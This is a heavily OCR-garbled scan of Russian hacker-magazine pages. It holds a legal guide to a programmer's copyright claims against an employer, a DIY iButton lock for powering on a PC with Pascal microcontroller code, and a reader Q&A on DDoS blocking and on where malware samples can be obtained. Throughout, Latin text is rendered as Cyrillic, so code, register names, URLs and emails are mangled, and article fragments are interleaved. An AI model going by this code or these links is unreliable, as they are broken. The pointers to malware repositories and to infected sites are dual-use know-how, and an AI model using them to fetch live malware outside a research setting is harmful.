договором между работодателем и автором не предусмотрено 
иное. 


Если работодатель в течение трех Лет со лы когла служебное 
произведение было предоставлено в его распоряжение, 

не начнет использование этого произведения, не передаст 
исключительное право на него другому лицу или не сообщит 
автору о сохранении произведения в тайне, исключительное 
право на служебное произведение принадлежит автору. 


Если работодатель в срок, предусмотренный в абзаце 
втором настоящего пункта, начнет использование 
служебного произведения или передаст исключительное 
право другому лицу, автор имеет право на вознаграждение. 
Автор приобретает указанное право на вознаграждение и в 
случае, когда работодатель принял решение о сохранении 
служебного произведения в тайне и по этой причине не 
начал использование этого произведения в указанный срок. 
Размер вознаграждения, условия и порядок его выплаты 
работодателем определяются договором между ним и 
работником, а в случае спора — судом. 


3. В случае, когда в соответствии с пунктом 2 настоящей 
статьи исключительное право на служебное произведение 
принадлежит автору, работодатель вправе использовать такое 
произведение способами, обусловленными целью служебного 
задания, и в вытекающих из задания пределах, а также 
обнародовать такое произведение, если договором между 
ним и работником не предусмотрено иное. При этом право 
автора использовать служебное произведение способом, не 
обусловленным целью служебного задания, а также хотя бы и 
способом, обусловленным целью задания, но за пределами, 
вытекающими из задания работодателя, не ограничивается. 


Работодатель может при использовании служебного 
произведения указывать свое имя или наименование либо 
требовать такого указания. 


печатями автоматически получает в бюрократической средеярлык 
чайника и лузера с соответствующим отношением в дальнейшем. Так 
что — только письменно, суведомлениями о доставке, подписями на 
втором экземпляре, протоколами переговоров ит.д. 

Переговоры следует начинать с письменного уведомления в адрес 
генерального директора о том, что предприятием используются 
[использовались] такие-то программы для ЭВМ, исключительные 
права на которые не перешли к работодателю, а остались утебя. В 
соответствии с законодательством об авторском праве, ты жела- 
ешь получать вознаграждение за них и предлагаешь заключить 
лицензионный договор. Такая бумага не может быть сокрыта или 
проигнорирована, она будет поставлена на учет в Канцелярии, 


› 134 


1. Право авторства — право признаваться автором 
произведения и право автора на имя — право использовать 
или разрешать использование произведения под своим 
именем, под вымышленным именем [псевдонимом] или 

без указания имени, то есть анонимно, неотчуждаемы и 
непередаваемы, в том числе при передаче другому лицу или 
переходе к нему исключительного права на произведение 

и при предоставлении другому лицу права использования 
произведения. Отказ от этих прав ничтожен. 


2. При опубликовании произведения анонимно или под 
псевдонимом (за исключением случая, когда псевдоним 
автора не оставляет сомнения в его личности] издатель (пункт 
1 статьи 1287), имя или наименование которого указано на 
произведении, при отсутствии доказательств иного считается 
представителем автора и в этом качестве имеет право 
защищать права автора и обеспечивать их осуществление. 
Это положение действует до тех пор, пока автор такого 
произведения не раскроет свою личность и не заявит о своем 
авторстве. 


получит резолюцию директора типа «разобраться, доложить» — и 
машина закрутится. 

Слишком многого не требуй. Понятно, что предприятию должно быть 
выгоднее приобрести лицензию, чем прекращать использование 
всех твоих программ. Впрочем, даже в случае прекращения за «уже 
съеденное» придется уплатить. 


Есть вариант внезапного нападения, без переговоров. Это на слу- 
чай, когда деньги автору не очень нужны. Тогда начать можно сразу с 
искового заявления в суд или заявления в прокуратуру о преступле- 
нии (ч. 2иЗст. 146 УК]. 

Уголовный вариант применяется, если совокупность твоих про- 
грамм может быть оценена в сумму свыше 50 000 рублей. Оценка эта, 
по идее, должна производиться экспертом-оценщиком в рамках 
предварительного следствия. В России очень часто никакой оценки 
не проводится, а размер нарушения принимается следователем со- 
гласно голословному заявлению правообладателя. Но еслиты — не 
«Майкрософт» и не «Коламбиа Пикчерз», не стоит рассчитывать на 
такое благоволение со стороны следствия и суда. Без независимой 
экспертной оценки стоимости твоих программ, скорее всего, не 
обойтись. Если 50 тысяч явно не наберется [с учетом общего коли- 
чества используемых экземпляров программ), уголовный вариант 
бесперспективен. 

Привлечение кадминистративной ответственности за нарушение 
исключительных прав (ст. 7.12 КоАП), когда размер нарушения ниже 
указанного порога — возможно. Но санкция за административное 
правонарушение предусмотрена настолько мелкая, что она вряд ли 
удовлетворит чувство мести обиженного программиста. Впрочем, сам 
факт привлечения куголовной или административной ответствен- 
ности за нарушение авторских прав можно потом использовать при 
подаче гражданского иска. Это сильно облегчит доказывание факта. 
Для гражданского процесса требуется подготовка. Здесь, в отличие 
от уголовного, никакого предварительного следствия нет, а каждая 
сторона самостоятельно собирает доказательства. Но придется до- 
казать суду, что: 
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а} программа написанатобой; 


6) она использовалась на компьютерах предприятием; 


в} она использовалась в работе предприятия, ане для личных целей 
работников. 

Размер ущерба доказывать не обязательно. Законодатель преду- 
смотрел два варианта: двойной размер стоимости программ или 
фиксированная сумма за каждый факт нарушения (ст. 1301 ГК). 
Хочешь — доказывай размер, если надеешься получить таким путем 
больше денег, хочешь — нет. 

То, что программа не является служебной, что права на нее не 
перешли и не были переданы работодателю, что автор не давал 
разрешения на использование — эти факты истец доказывать не 
обязан. Ответчик пусть попробует доказать обратное. 


Чем докажешь? 


Авторство (факт создания программы определенным человеком] 
можно подтвердить несколькими способами. Абсолютного до- 
казательства, непобиваемого и неоспариваемого, пожалуй, не 
существует. Не надо пытаться его искать. Парочка прямых, пусть и не 
стопроцентных доказательств плюс несколько косвенных — такого 
набора вполне достаточно, чтобы убедить судью. Противная сторона, 
скорее всего, не сможет представить ничего убедительного, чтобы 
опровергнуть твое авторство и доказать свое. 

Доказательствами авторства могут быть: 

» показания свидетелей, которые видели часть процесса создания 
программы, давали поручения относительно этой программы, про- 
сили ее дополнить или исправить; 

» показания соавторов и авторов отдельных модулей, библиотек, 
программ, с которыми налаживался обмен данными; 

® наличие утебя исходников, которые отсутствуюту противной 
стороны; 

» депонирование программы в каком-либо авторитетном депозита- 
рии оттвоего имени с как можно более ранней датой; 

® регистрация программы в «Роспатенте» в соответствии со ст. 1262 ГК; 
» представление более ранних версий, черновиков, подготовитель- 


ных материалов, которых нету противной стороны [например, схема 
взаимосвязей функций программы или описание недокументиро- 
ванных возможностей): 

» включение в исходный текст или объектный код твоего имени 
стеганографическими методами; 

® служебная переписка и иные документы, где ты упомянут в каче- 
стве разработчика (например, заявки об обнаружении багов итвои 
ответы об их исправлении); 

® заключение эксперта о совпадении стиля написания и/или оформ- 
ления исходного текста программы с другими твоими программами, 
авторство которых не подвергается сомнению; 

® заверенная нотариусом дата на исходном тексте программы (это 
косвенное доказательство, доказывает лишьто, что ты имел ис- 
ходный текст натакую-то дату); 

Понятно, что «неслужебные» программы пишутся, как правило, по 
инициативе работника. За депонированием версий, написанием 
документации никто не следит, техзадание не составляет, структуру 
БД не утверждает. В этих условиях все черновики и сопутствующие 


документы оседаюту автора, ау работодателя — ничего. Не стирай 
их, лучше закатай в архив иунеси в безопасное место — это может 
пригодиться на случай будущего конфликта. 


ИМЯ 


Кроме исключительных прав, автор также имеетряд прав неимуще- 
ственного характера, в частности, право на имя. Автор программы 
[все соавторы] имеет право указать свое имя или псевдоним на 
экземплярах этой программы. Оно неотчуждаемо и неотказуемо. Ты, 
конечно, можешь не пользоваться этим правом, но любой отказ от 
него недействителен. 


К сожалению, закон не определяет, в каком виде и в каком месте 
должно быть указано имя автора. Для книги фильмов такое место 
определено традициями [обычаи делового оборота — ст. 10 ГК). Для 
компьютерных программ традиции не сложились. Возможно, потому, 
что в стране, производящей большинство программ, то есть, в США, 
право на имя не является неотчуждаемым, программисттам легко 
лишается этого права, подписав соответствующую бумагу. 

В России, какие бы обязательства ни подписывал работник, он 
может потом настаивать на указании себя в числе авторов. Зана- 
рушение этого права предусмотрена гражданская ответственность 
(ст. 1251 ГК). 

Другое неимущественное право — право считаться автором — за- 
ключается в том, что ты можешь невозбранимо заявлять: «Я написал 
эту программу». Независимо оттого, кто ее использует, кому были 
переданы и потом перепроданы исключительные права на нее, кому 
на каких условиях выдана лицензия. Понятно, что к служебным про- 
граммам это также относится. Например, при составлении резюме 
или портфолио это право актуально. 


Образец для подражания 


Несмотря на то, что норма о служебных произведениях действует 

в России с 1993 года, судебных прецедентов по ней было немного. 
Скорее всего, стороны предпочитают не доводить дело до судебной 
огласки и стараются урегулировать спор втиши кабинетов. 
Впрочем, один прецедент вашему покорному слуге известен. Я в нем 
участвовал в качестве посредника по просьбе автора — потенциаль- 
ного истца. 

Программист при увольнении из компании «А» не получил всех обе- 
щанных ему денег. Он выждал годик, пока продукт, в написании которо- 
го участвовал, был завершен. Затем его передали в эксплуатацию (ли- 
цензировали) крупной нефтегазовой корпорации «Т». И только после 
этого программист прислал кбывшему работодателю своего адвоката. 
Особенность ситуации втом, что формальным нарушителем авторских 
правтеперь являлся уже нетолько недобросовестный работодатель 
программиста «А», но и богатенький «Т»**. Ответчиком можно было 


назначать любого из них или обоих вместе. Оценивтакую перспективу, 
владелец компании «А» предпочелтихо расплатиться с нашим героем, 
лишьбы нефтегазовый заказчик не узнал, какого юридического троян- 
ского коня ему продали под видом программного продукта. 

В качестве постскриптума хочу напомнить, что в старину на Руси 
говорили: «С сильным не дерись, с богатым не судись». Что измени- 
лось с тех пор в стране? Изменилось все. И ничего. и 


* «Исключительными правами» ныне именуется то, что раньше называлось более очевидным термином — «авторские имущественные права», то есть 


права на использование произведения, которые могут быть переданы другому и, следовательно, конвертированы в деньги. В отличие от них, «авторские 


неимущественные» (такие как право на имя, право на защиту произведения от искажений] являются моральными правами, не передаются и не 


превращаются в деньги. 


_- Да, конечно, он не знал. Но в гражданском праве нет принципа вины. Ответственность может наступать и при отсутствии умысла (например, ПП: 3 СТ. 1250 


ГК). Нарушал — плати. А потом можешь подавать так называемый регрессный иск к тому, кто действительно «знал» или «виноват». 
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Ш Ш Андрей «Чсодег» Чеснаков (4содег.тма\@дтаЦ.сот) 


ЗАПИРАЕМ КОМП 
НА АМБАРНЫЙ ЗАМОЕ 


Делаем электронный замок 
ючахВиКоп 


ДЛЯ Компа На 


© Домофоны и сигнализации, 
использующие ключики 1ВиЦоп, 
можно встретить почти везде. 


Сделаем и мы простенький замок на 
этих ключах. Он, конечно, не умеет 


открывать огромные стальные 
двери, зато способен распознать 
свой ключ И ВКЛЮЧИТЬ Компьютер. 


Разбор полетов, постигаем теорию 


Во-первых, наше устройство должно уметь считывать код с домо- 
фонных таблеток. Думаю, тебе известно, что, как правило, работают 
они по протоколу 1-\млге. Есть несколько способов эмуляции этого 
протокола при помощи МК. Я использовал самый простой — дрыга- 
нье ножкой МК в такт протоколу. У этого способа, конечно, есть свои 
недостатки, но для нашего устройства они не критичны, ибо стано- 
вятся заметны только в том случае, когда МК должен параллельно 
с чтением ключа заниматься кучей другой работы [а у нас такого к 
счастью нет). 

Для того чтобы отличать свой ключ от чужого, устройство должно 
помнить код своего ключа. Для этого мы используем ЕЕРКОМ- 
память микроконтроллера. Ключ будем запоминать всего один, и на 
него понадобится 8 байт ЕЕРКОМ-памяти (если чуть обрезать фор- 
мат, то можно уложиться и в 6 байт]. Чтобы обучить замок новому 


ключу на плате, в месте недоступном юзеру, сделаем кнопку «[еагп», 


при нажатии на которую, микроконтроллер будет считывать ключ и 
записывать в энергонезависимую память. Если есть необходимость, 
ты можешь увеличить количество запоминаемых ключей, немного 
дописав программу. 

Когда компьютер выключен, замок должен питаться от какого-то 
внутреннего источника. Например, батарейки. Моя версия устрой- 
ства почти год работала от одной батарейки СК2032, а от пары 
мизинчиковых батареек ААА проработает намного дольше. Кстати, 
если замок будет размещен в корпусе компьютера, то можно попро- 
бовать подключиться к линии 5\/ УЗВ (фиолетовый провод] на БП 
компа. На ней есть напряжение 5 \, даже когда компьютер выклю- 
чен [разумеется, не из розетки). Тогда вместо двух источников пита- 


ния (5 Уи батарейка] в схеме будет всего один. 
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1-миге 

Протокол 1-\млге, по которому ключ общается с домофоном, описан в 
каждом втором блоге по электронике. Но я все же повторюсь и рас- 
скажу, что это такое, и под каким соусом его едят. 

Физически шина 1-\/ге состоит из одной линии, по которой переда- 
ются и данные, и питание. Эта линия подтянута к источнику питания 
(обычно 5 \/) резистором в несколько килоом. Максимальный ток 
всех устройств на линии ограничивается этим резистором. Если 
устройству требуется больший ток, то можно подключить внешнее 
питание. Или подключать линию связи к питанию на то время, пока 
устройству нужен большой ток [например, так работают с термоме- 
тром 0518620]. 

Все устройства на шине 1-\мге делятся на ведущих [та$ег] и 
ведомых [$[а\е}. В нашем случае мастером будет замок, а ведомым 
— ключ. Мастер может по своему желанию начать обмен данными, 
передавать ведомым устройствам команды и читать из них данные. 
Ведомые должны ждать, пока к ним обратится ведущий — сами они 
не могут начать обмен данными. 

Для передачи сигналов ведущий (или ведомый] прижимает линию 
к земле. В ведомом устройстве есть цепочка из диода и конденса- 
тора, которая позволяет ему работать, пока напряжение на линии 
болтается около земли. Единица передается коротким импульсом 
(5-10 микросекунд), а ноль — длинным (до 50-100 микросекунд). 
Между импульсами должна быть пауза в несколько микросекунд, 
чтобы конденсатор в ведомом устройстве успел зарядиться, и оно 
не сдохло на следующем импульсе. Кроме нуля и единицы есть два 
специальных сигнала: КЕЗЕТ, длиной не менее 480 мкс, который 
подается ведущим перед началом обмена, и РКЕЗЕМСЕ, длиной в 
100-200 мкс, его подает ведомый после того, как услышит сигнал 
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Рис. 1. Устройство в сборе. 
Второй (красный} светодиод 
не используется 


горя 


КЕЗЕТ. При передаче байта сначала передается младший бит, а в 
конце — старший. 

Обмен данными между ведущим и ведомым идет по такому сценарию: 
1. Мастер подает сигнал КЕЗЕТ. 

2. Ведомый отвечает сигналом РКЕЗЕМСЕ [типа — «я здесь!»). 

3. Ведущий подает КОМ-команду. У каждого ведомого есть 8 байт 
КОМ-памяти с уникальным кодом, по которому ведущий отличает 
их друг от друга. А у наших ключей (если точнее — микросхема 
051990А — самая популярная модель 'ВиКоп] кроме этой памяти 
вообще ничего нет. 

4. В зависимости от команды мастер может прочитать КОМ-память 
ведомого или передать код нужного ему ведомого, чтобы продол- 
жить связь конкретно с ним. Мы будем читать КОМ-память ключа 
командой Веад РОМ [0х33). 

Первым байтом в КОМ-памяти идет код семейства. У 0$1990А — это 
0х01. Дальше идет 6 байт серийного номера и байт СКС. Мы будем 
сохранять серийный номер целиком (вместе с кодом семейства и 
СКС) в ЕЕРКОМ. Считанный код ключа будем просто сравнивать с 
номером в памяти, без расчета СКС и прочих проверок на ошибки. 
Нашему замку понадобится как-то определять, что ключ появился 
на линии. Обычно эта задача решается регулярным опросом шины: 
мастер подает КЕЗЕТ и ждет РКЕЗЕМСЕ-сигнала от ведомого. Но 
такой способ нам не подходит — МК будет постоянно в активном 
режиме, то есть, расходовать батарейку. Можно использовать спя- 
щий режим, просыпаясь раз в несколько секунд, чтобы проверить 
наличие ключа. 

Но есть более красивое решение: МК настраивает внешнее пре- 
рывание так, чтобы оно сработало, когда линия связи прижимается 
к земле, потом переходит в спящий режим. В этом режиме отклю- 
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Передача 70” 


Передача 1 


Чтение "(Г 


Чтение "1" 
$15 


"“ | Ведущевя прылкьрльет пы Ве помня прабальыает лыныво 
| рерк 


в ыыы к мыла 


Рис. 2. Передача и чтение данных на шине 1-ммге 


чается вся периферия МК, даже тактовый генератор, и потребление 
снижается до долей микроампера. Когда ты тыкаешь ключом в пад, 
конденсатор в ключе начинает заряжаться и просаживает напря- 
жение на линии почти до нуля. Всего на несколько микросекунд, но 
этого хватит, чтобы прерывание сработало и вывело МК из спящего 
режима. Дальше он прочитает ключ, сравнит его с кодом в памяти 
И ВКЛЮЧИТ Комп. 


Схема устройства 


Теперь пора поподробнее разобраться с железом. 

Микроконтроллер нам нужен простой и дешевый. Можно, конечно, 
поставить какой-нибудь понтовый АКМ, но вдоволь и ограничиться 
АТГ!пу1 3. К нему подключим кнопку «[еагп», подтягивающий рези- 
стор для 1-умге, зеленый светодиод (которым будем мигать, если 
ключ прошел проверку] и транзистор для управления БП компа (см. 
схему на рис. 6). Транзистор можешь взять любой маломощный, 
главное, чтобы он был типа МРМ. У меня были залежи ВС846 в мел- 
ком 5МО-корпусе, поэтому поставил его. 

Коллектор транзистора (Х1] и его эмиттер (Х2] мы подключим к 
материнке вместо родной кнопки питания. Если перепутать кон- 
такты местами, то ничего страшного не произойдет, просто комп не 
будет реагировать на попытки его включить. Для питания схемы 

5 Вольт можно найти на любом незанятом разъеме в системном 
блоке. Например, почти у всех без дела болтается разъем флоппи- 
вода. От него нам нужны красный (+5] и черный провода. 

Оба источника питания (5 \/ от компа и батарейка] подключены через 
диоды. Нужно это для того, чтобы они не перекачивали ток друг-в- 
друга. При включенном компьютере ток идет в схему через диод 01, 
а 02 не дает ему испортить батарейку. Когда комп отключен, ток пой- 


> 137 


0х33 
5: 


0х33 0х01 


Кез а КОМ 


оепа[ сое 


эепа[ сое 
Рагийу сода 1 2 


Ш Передача (мастер -> ведомый) 


Рис. 3. Пример обмена данными между замком и ключом 


дет через 02, а 01 не даст току от батарейки попасть в линию пита- 
ния компа. В качестве 02 лучше всего брать диод Шоттки. Он обла- 
дает маленьким падением напряжения, порядка 0,2 В. Если взять 
обычный диод, то МК может не хватить напряжения для работы. 


Сборка 


Плату я делал методом ЛУТ. Он уже упоминался на страницах журна- 
ла (см. материалы к статье «О! НАЙТа» в номере |[ 118, октябрь 2008 
года). Технология довольно проста и дает неплохие результаты. Плата 
для этого устройства должна получиться у тебя с первого раза. Ну, или 
со второго. Если нет желания заморачиваться с утюгом, то можешь 
собрать схему на макетной плате, благо деталей там совсем немного. 
Корпус можно сделать из чего угодно. Мой когда-то был корпусом от 
блока питания. Если ты решил поставить устройство в корпус компа, 
то можешь использовать в качестве основы заглушку от флоппивода 
или дисковода. В приложении к статье есть плата, нарисованная под 
заглушку от ЕОО. Посмотреть эту схему можно в бесплатной програм- 
ме \Ме\/-ауоц{ [доо.дИКВКХЕ). 

Пад под ключ тоже запросто делается из подручных материалов. 
Например, из обрезка какой-нибудь металлической трубки со вну- 
тренним диаметром не меньше 1,6 см. Вариантов на самом деле 
много, здесь сам выбирай, исходя из того, что есть под рукой. Я сде- 
лал пад из куска провода, скрученного в кольцо, залитого припоем и 
припаянного на плату. Потом выяснилось, что получилось слишком 
высокое кольцо [реально там хватает и пары миллиметров), поэтому 
на круг в центре пришлось припаять гайку. Выглядит забавно. 


Алгоритм работы 


В качестве языка разработки я выбрал Паскаль. Вообще, 95% про- 
грамм под МК пишутся на Си или ассемблере, но первый я на А/К 

не пользую, а второй только в виде вставок по ходу программы. За 
компилятор сойдет МгоРазса( ог АУК (буква «К» — не баг, а фича). У 
него ограничение до 2 КБ кода в бесплатной версии. Этого нам более 
чем достаточно — у Ппу13 всего 1 КБ флеш-памяти. 

В начале, при подаче питания нужно инициализировать периферию. 
Большая часть устройств не используется, поэтому мы их не трогаем. 


АСЪК.АСО := 1; //Отключаем аналоговый компаратор 
ООВВ := 
//пины: ВА (транзистор) и ВО (светодиод) 


%00010001; //Переключаем на выход 


РОВТВ := %00001001; //Включаем подтягивающий резистор на кнопке 
МСУСВ .$М@ := 1; //Тип спящего режима — ромег аомп 

МСУСВ.$Е := 1; //Спящий режим разрешен 

азт °е1 епа; //Глобально разрешаем прерывания 


После того, как МК настроит периферию, он продолжает работать в 
обычном режиме. 


СТЕК. ТМТЕО := 1; //Сбрасываем флаг прерывания 
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оеёпа! сое 


МВ 


оепа[ сое 
3 -1 


№ чтение (ведомый -> мастер} 


СТМ$К.ТМТ@ := 1; //Разрешаем прерывание 
азт °1еер епа; //Отбой! 

Настраивает прерывание 1МТО (которое висит на ножке В1] и пере- 
ходит в спящий режим. 

Обрати внимание, что остальной код (чтение ключа, сравнение и 
включение компа] идет сразу после команды $еер. Когда произойдет 
прерывание, МК проснется и бросится в обработчик ПМТО_га. В этом 
обработчике только одна команда — отключение прерывания, чтобы 
оно не возникало во время обмена данными с ключом. После обра- 
ботчика МК вернется к тому месту, откуда он прыгнул в прерывание (к 
команде $«еер} и начнет выполнять код дальше. 


Ое]ау т5(2); //Задержка, чтобы ключ успел 
//выйти в рабочий режим 

ООКВ.1 := 1; //Даем КЕЗЕТ 

Ое]ау и5(500); 

ВОВВ.Т '= 9; 

Ое]ау_и$5(50); 

//Ждем, после этого линия должна быть прижата 
//к земле РВЕЗЕМСЕ-сигналом 

1+ РТМВ.1=1 ЕПеп сопЕ1пие; 

// Если РКЕЗЕМСЕ нет, то прерываем процесс 
Ое]ау_и5(250); //Ждем еще немного 
//РКЕЗЕМСЕ-сигнал должен закончиться 
Веаа_1Ви{Фоп; //Читаем ключик 

1+ СВС_ОК <> @ %Пеп соп1птие; 

//Если СВС не совпало — попробуем еще раз 


Сначала он ждет несколько миллисекунд. Нужно это для того, чтобы 
конденсатор в ключе полностью зарядился, и он вошел в рабочий 
режим. Потом МК подает КЕЗЕТ-сигнал. Для этого он переключает 
бит 1 в регистре ВОКВ. Каждый бит этого регистра отвечает за соот- 
ветствующую ножку МК. Единица означает, что ножка настроена на 
выход, а логический уровень на ней (проще говоря, напряжение] 
задается битом в регистре РОБТВ ( нас туда записан ноль). Ноль 

в ООКВ значит, что ножка настроена на вход. Вот и получается, что 
записав в ООКВ 1, МК прижимает ножку к земле, а записав 0 — отпу- 
скает, и ножка висит на внешнем ри(-ир-резисторе. После КЕЗЕТ- 
сигнала МК проверяет, есть ли сигнал РКЕЗЕМСЕ. Если нет, то идет 
снова спать — это был не ключ, а какая-то помеха. Если же ключ 
ответил, то МК выполняет процедуру чтения. Ее код я приводить не 
буду, ибо он довольно большой. В этой процедуре происходит вот что: 
1. Сначала подается команда на чтение КОМ-памяти — 0Х33. 

2. После этого МК читает 8 байт, попутно считая СКС: результат этих 
подсчетов он запишет в переменную СКС_ОК. 

3. Прочитанные байты складываются в массив КОМ_Оаа. 

Для расчета СКС используется табличка на 256 байт. Вначале пере- 
менная СКС обнуляется, и с каждым байтом кода проводится такое 
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Рис. 4. Сигналы КЕЗЕТ и РКЕЗЕМСЕ, предваряющие каждый 
обмен данными 


действие — СКС := СКС_ТаБе[СКВС хог Ва{аВуе];. В результате, если 
все байты передались верно, в конце СКС будет = 0. СКС вычис- 
ляется при каждом чтении ключа, «на лету». После выполнения 
функции Кеа9а КОМ-программе остается только посмотреть на пере- 
менную СКС_ОК. Если она = 0, то ключ прочитался верно. Если тебе 
интересен «нормальный» алгоритм расчета СКС, без таблицы, то 
можешь заглянуть в документацию на 'ВиКоп (есть на диске) или в 
«Википедию» (СВС8]. 

Далее МК проверяет нажата ли кнопка «(еагп». Если нажата, то только 
что прочитанный ключ записывается в ЕЕРКОМ, после чего МК снова 
идет спать. Если кнопка не нажата, то МК сверяет то, что он прочитал, 
с тем, что записано в ЕЕРКОМ. И если коды совпали — врубает комп. 
Потом пройдет небольшая пауза, цикл повторится снова, и МК заснет 
в ожидании ключа. 


Программатор и прошивка 


Наверное, самый важный вопрос связан с прошивкой микроконтрол- 
лера — как, чем, куда? 

Если у тебя есть рабочий программатор, который ты вполне успешно 
используешь, то эту часть можно невозбранно пропустить: здесь рас- 
сказывается о том, как собрать простенький программатор для АУК и 
прошить с его помощью МК. 

Программаторов для А/К существует целая куча. Но здесь мы рассмо- 
трим одну из самых простых и «дубовых» моделей — программатор 
Громова. 

Этот программатор подключается к СОМ-порту. Со всякими переход- 
никами У$В<>СОМ работает очень плохо. Гораздо лучше с переход- 
никами РС<>СОМ или «железным» портом. Если на заднице компа 
ничего похожего на СОМ-порт не заметно, это не значит, что его нет. 
Возможно, разъем просто не распаян на плате, а место под него есть. 
В таком случае можно либо попытаться запаять разъем на место, 
либо забить и не рисковать материнкой :]. 

Для сборки программатора тебе понадобятся семь резисторов и три 
диода. Немного, правда? :] 

Резисторы можно взять номиналом от 1 до 10 килоом, диоды — 
любые из маломощных. 

Схему программатора ты можешь видеть на рис. 5. Собрать его можно 
хоть на макетке, хоть просто навесным монтажом. Обрати внимание, 
что питание для МК при прошивке нужно брать из отдельного источ- 
ника. Если этот источник связан с компом (например, +5 В от Ц5В}, то 
достаточно просто подключить его к ножке \Усс МК. Если же источник 
это какой-то внешний БП или батарейка, то нужно прицепить к МК не 
только питание, но и землю (бпд]. 

Для работы с этим программатором используется программка Упирго!. 
Ее ты можешь найти на диске. 

При запуске Упи!ргоТт автоматически проверяет, подключен ли МК, и 
показывает его название. Подключив к программатору АТТтпу13, ты 
должен увидеть над окошком На$Н синюю надпись «К, 64] Тту13» — 
1 килобайт флеш-памяти и 64 байта ЕЕРКОМ. Если вместо этого про- 
граммка выкидывает тебе сообщение об ошибке, то проверяй сборку 
(замыкания или непропай] и правильность подключения. 

Перед прошивкой флеш-память надо очистить кнопкой «Егазе». 
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Рис. 5. Схема программатора Громова 


Потом загружаем файл с прошивкой кнопкой «открыть» с надписью 
«Нех» (он лежит в приложении к статье, в папке Нгпл\миаге). Слева 
появляется содержимое файла в шестнадцатеричном виде. Осталось 
только нажать «РКОСб» для начала прошивки. Если в процессе про- 
шивки возникнут ошибки, то стоит попробовать укоротить провода от 
программатора до МК. В идеале их длина должна быть не больше 10 
см. Гакже стоит прозвонить схему тестером на предмет замыканий 
или разрывов. 

Для правильной работы программы тебе потребуется выставить Ти$е- 
биты. Это специальные настроечные флаги, позволяющие менять 
частоту МК, источник тактового сигнала и другие параметры. Здесь 
надо соблюдать осторожность — если неправильно выставить фьюзы, 
то можно заблокировать МК. 

Тебе надо отключить флаг СКОМ8, который отвечает за делитель так- 
товой частоты. По умолчанию он включен, и МК работает на частоте 
1,2 МГЦ, а нам нужно 9,6 МГц. Для работы с Тазе есть кнопка с соот- 
ветствующим названием. В окошке Тизе ты увидишь список всех фью- 
зов для этого МК. Перед тем как что-то менять, надо нажать кнопку 
«Кеа4» под нужной колонкой, чтобы прочитались текущие значения 
флагов. Фьюзы в А\К инверсные, то есть пустой квадратик напротив 
СКОМ8 значит, что делитель включен. Для того чтобы его отключить, 
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Рис. 6. Схема устройства 


ставь галочку напротив фьюза и нажимай кнопку «\\/гце», под нужной 
колонкой. Все, флаг выставлен и начнет действовать после переза- 
пуска МК. 


Заключение 


Устройство получилось довольно простое, но вместе с тем полезное. 
Конечно, какой-либо надежной защиты компьютеру оно не дает, но 
спасти от посягательств младшего брата вполне может :]. Да и соз- 
давалось оно мной, в первую очередь, для изучения А\УК и протокола 
1-млге. Впрочем, замок можно использовать не только для включения 
компа. Ты можешь подключить к нему реле и управлять электромаг- 
нитным замком, или сервомашинку — для того, чтобы открывать и 
закрывать дверь. Главное — твоя фантазия и умение применить воз- 
можности МК. = 
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Есть вопросы — присылай 
на {аа@геа|.хаКер.ги 


О:У меня вопрос по защите от ООо5. Как 
люди умудряются отбиваться от большого 
количества паразитного трафика без 
какого-либо дорогостоящего оборудо- 
вания? 

А: Если атака не носит масштабного харак- 
тера, то неплохо справиться с ситуацией мо- 
жет помочь даже просто 1р{а (е$. В «Колонке 
редактора» прошлого номерая рассказы- 
вал, как прикрутить к файрволу геомодуль, и 
в случае необходимости эффективно блоки- 
ровать все запросы из нежелательных стран 
(Например, Китая). Увы, это самый простой 
случай. Относительно несложное решение 
предоставляеттакже проект ([0]}Во5 ОеНа{е 
(ЧеНа(е.гпед!а(ауегсогп). Это БазН-скрипт, 
который ведет список |[Р-адресов, с которых 
осуществляются коннекты, атакже количе- 
ство подключений с каждого из них. Логика 
более чем тривиальная: при достижении 
определенного количества коннектов, все 
последующие просто блокируются в течение 
некоторого времени. Блокировка осущест- 
вляется стандартным файрволом: 1р{аб(е$ 
или Адуапсед Ройсу ЕгеммаЦ [АРЕ). Установ- 
ка Во5 ОеЦа{е предельно упрощена: 


> 14.0 


исее ПЕЁр: //ммм.1пефБа$е . сот/ $сг1ре$/ 
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Количество возможных подключений за- 
дается через конфиг /и$г/(оса/990$/99 05. 
сопЁв параметре МО_ОЕ_СОММЕСТ!ОМ5. 
Рекомендую установить это значение 
побольше, чтобы случайно не забанить 
группы людей, которые работают через 
МАТ. Тутнадо сказать, что используемый 
подход довольно примитивен. Более 
продвинутые решения, предлагаемые 
специализирующимися на защите от 
подобных атак компаниями, используют 
рейтинговые системы. То есть, решениео 
блокировке принимается не «втупую» на 
основе количества подключений, а только 
если он действительно «проштрафит- 
ся». Для каждого посетителя с помощью 
интеллектуальной системы производится 
поведенческий анализ, который на основе 
некоторых формальных признаков может 
дать ответ, с кем мы имеем дело: собыч- 
ным юзером или ботом. 


О: Многие ресерчевы активно делятся 
результатами своих исследований НОВЫХ 
образцов малвари. Но где они их берут? У 
них же нет доступак базам антивирусных 
компаний, верно? 

Д: Можно выделить несколько основных 
Источников. 

Во-первых, есть немало ресурсов, где 
активно агрегируется большое количество 
тел вирусов. Это и форумы, где энтузиасты 
активно делятся своими образцами (в том 
числе и сотрудники антивирусных вендо- 
ров}, испециализированные, автоматиче- 
ские сервисы. Известный эксперт в области 
ИБ Ленни Зелцер ведет список подобных 
ресурсов, и в него сейчас входят следующие 
проекты: 

» АЧтипи$ Ма(\Маге Апа(у$15 Сгоир Затр(е$ 
(адтити$.пеУзатр@$.а$рх); 

® Соп{адо МаМаге Оитр (соп{адюдигр. 
Ыодеро*.согп}; 

® Кегпе[Моде. гп (млмм.Кегпелоде ип о/ 
Когига/МемИогигп.рвр?=16); 

® Ма[\/агеВ(аскИ${ (млм. ппамагеб(асКИ <. 
согп/5Вом/ МО .рВр)}; 

® Ма\/агеВУез Гоги (Югигп®. 
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гоам/агеб\е$.0га]; 

® МоуСоп Тег ЕХЕ Рагта 
[ото{аигапа($1$.сопп/ехе\меей; 

® ОНепме Сотрий па (млллм. 
оНеп®месогттрипа.пе]); 

® бесиВох [аб $ (5есибох(аБ®.!'). 
Во-вторых, загрузить образцы актуальной 
малвари можно оттуда, откуда злоумыш- 
ленники их впаривают пользователям, — с 
зараженных сайтов. Списки «опасных» 
ОКЕ доступны на млм. ппа\\агедогтат $1. 
сот и ммм. паМагеиг(.сот. Дальше подход 
нехитрый: запускаем виртуальную машину, 
открываем в старом непатченном браузере 
один сайт за другим и, анализируя измене- 
ния в файловой системе и реестре, удив- 
ляемся, насколько легко можно подцепить 
троя, просто серфя инет. 


В-третьих, никто не мешает поднять свои 
